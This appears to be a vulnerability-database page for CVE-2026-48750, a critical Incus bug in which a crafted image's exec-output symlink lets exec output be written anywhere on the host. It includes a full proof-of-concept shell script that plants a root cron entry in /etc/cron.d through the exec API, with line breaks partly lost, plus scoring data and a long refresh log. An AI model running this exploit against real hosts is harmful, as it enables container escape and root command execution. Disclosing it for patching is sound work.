CVE-2026-48750

CRITICALPre-NVD 9.99.9
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.9 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.9
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.9Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Incus has an arbitrary file write on host via exec-output symlink in crafted image

Summary

The record-output parameter of the /instances/$name/exec endpoint stores the output of the command in the exec-output directory of the instance. If exec-output is a symlink, file named exec_UUID.stdout and exec_UUID.stderr can be written to an arbitrary location where the .stdout file will contain arbitrary content. This behavior can be abused for arbitrary command execution.

Details

When an image is unpacked, top-level symlinks are extracted as is; allowing for exec-output to be placed on disk. In instance_exec.go, os.Mkdir continues of exec-output exists and os.OpenFile follows the exec-output symlink.

PoC

Below, we place the exec_UUID.stdout file in /etc/cron.d on the host for arbitrary command execution.

#!/bin/sh

usage: $0 existing-imagefp

set -eu

basefp="${1}"

die() { printf '%s' "${@}" >&2 exit 1 }

command -v curl >/dev/null 2>&1 || die 'error: curl not found\n' command -v python3 >/dev/null 2>&1 || die 'error: python3 not found\n'

tmpdir=$(mktemp -d) cleanup() { rm -rf "${tmpdir}" } trap cleanup EXIT INT QUIT TERM HUP

insert exec-output symlink

incus image export "${basefp}" "${tmpdir}/img"

mkdir "${tmpdir}/repack" cd "${tmpdir}/repack"

xz -cd "${tmpdir}/img" | tar -f- -vx

rm -rf exec-output ln -s /etc/cron.d exec-output

tar -f- -c * | gzip -c9 >"${tmpdir}/img"

cd - >/dev/null incus image import "${tmpdir}"/img* --alias afw-exec-output

Launch container, exec with record-output via REST API

incus launch afw-exec-output afw-exec-output incus wait afw-exec-output ip

OP=$(curl -s --unix-socket /var/lib/incus/unix.socket \ -X POST -H 'Content-Type: application/json' \ -d '{"command":["/bin/sh","-c","echo * * * * * root id'"'>'"'/afw-exec-output"],"record-output":true}' \ "lxd/1.0/instances/afw-exec-output/exec" | python3 -c "import sys,json;print(json.load(sys.stdin)['operation'])")

curl -s --unix-socket /var/lib/incus/unix.socket "$OP/wait?timeout=30" >/dev/null

#find /etc/cron.d/exec_* -exec cat {} \;

Impact

Constrained file creation in an arbitrary directory on the host via via an unsanitized symlink; possibly leading to command execution.

CVSS v3
9.9
EG Score
9.9(low)
EPSS
KEV
Not listed

Published

June 26, 2026

Last Modified

June 26, 2026

Vendor Advisories for CVE-2026-48750(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 38× in last 7d / 57× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 01:20 UTCEG score recompute
  2. 2026-07-06 20:57 UTCEG score recompute
  3. 2026-07-06 16:29 UTCEG score recompute
  4. 2026-07-06 11:52 UTCEG score recompute
  5. 2026-07-06 07:27 UTCEG score recompute
  6. 2026-07-06 03:02 UTCEG score recompute
  7. 2026-07-05 22:37 UTCEG score recompute
  8. 2026-07-05 18:14 UTCEG score recompute
  9. 2026-07-05 13:51 UTCEG score recompute
  10. 2026-07-05 09:26 UTCEG score recompute
  11. 2026-07-05 05:01 UTCEG score recompute
  12. 2026-07-05 00:36 UTCEG score recompute
  13. 2026-07-04 20:12 UTCEG score recompute
  14. 2026-07-04 15:48 UTCEG score recompute
  15. 2026-07-04 11:22 UTCEG score recompute
  16. 2026-07-04 06:59 UTCEG score recompute
  17. 2026-07-04 02:29 UTCEG score recompute
  18. 2026-07-03 22:04 UTCEG score recompute
  19. 2026-07-03 17:39 UTCEG score recompute
  20. 2026-07-03 13:16 UTCEG score recompute
  21. 2026-07-03 08:53 UTCEG score recompute
  22. 2026-07-03 04:30 UTCEG score recompute
  23. 2026-07-03 00:05 UTCEG score recompute
  24. 2026-07-02 19:41 UTCEG score recompute
  25. 2026-07-02 15:19 UTCEG score recompute
Show 32 more
  1. 2026-07-02 10:56 UTCEG score recompute
  2. 2026-07-02 06:28 UTCEG score recompute
  3. 2026-07-02 02:04 UTCEG score recompute
  4. 2026-07-01 21:40 UTCEG score recompute
  5. 2026-07-01 17:17 UTCEG score recompute
  6. 2026-07-01 12:54 UTCEG score recompute
  7. 2026-07-01 08:31 UTCEG score recompute
  8. 2026-07-01 04:07 UTCEG score recompute
  9. 2026-06-30 23:44 UTCEG score recompute
  10. 2026-06-30 19:16 UTCEG score recompute
  11. 2026-06-30 14:53 UTCEG score recompute
  12. 2026-06-30 10:29 UTCEG score recompute
  13. 2026-06-30 06:06 UTCEG score recompute
  14. 2026-06-30 01:43 UTCEG score recompute
  15. 2026-06-29 21:20 UTCEG score recompute
  16. 2026-06-29 16:57 UTCEG score recompute
  17. 2026-06-29 12:32 UTCEG score recompute
  18. 2026-06-29 08:09 UTCEG score recompute
  19. 2026-06-29 03:46 UTCEG score recompute
  20. 2026-06-28 23:20 UTCEG score recompute
  21. 2026-06-28 18:57 UTCEG score recompute
  22. 2026-06-28 14:34 UTCEG score recompute
  23. 2026-06-28 10:11 UTCEG score recompute
  24. 2026-06-28 05:47 UTCEG score recompute
  25. 2026-06-28 01:24 UTCEG score recompute
  26. 2026-06-27 21:01 UTCEG score recompute
  27. 2026-06-27 16:38 UTCEG score recompute
  28. 2026-06-27 12:15 UTCEG score recompute
  29. 2026-06-27 07:52 UTCEG score recompute
  30. 2026-06-27 03:29 UTCEG score recompute
  31. 2026-06-26 23:02 UTCEG score recompute
  32. 2026-06-26 18:39 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-48750?
CVE-2026-48750 is a critical vulnerability published on June 26, 2026. Incus has an arbitrary file write on host via exec-output symlink in crafted image Summary The record-output parameter of the /instances/$name/exec endpoint stores the output of the command in the exec-output directory of the instance. If exec-output is a symlink, file named execUUID.stdout and…
When was CVE-2026-48750 disclosed?
CVE-2026-48750 was first published in the National Vulnerability Database on June 26, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-48750?
CVE-2026-48750 has a CVSS v4.0 base score of 9.9 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-48750?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48750, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-48750

Explore →

Is Your Infrastructure Affected by CVE-2026-48750?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.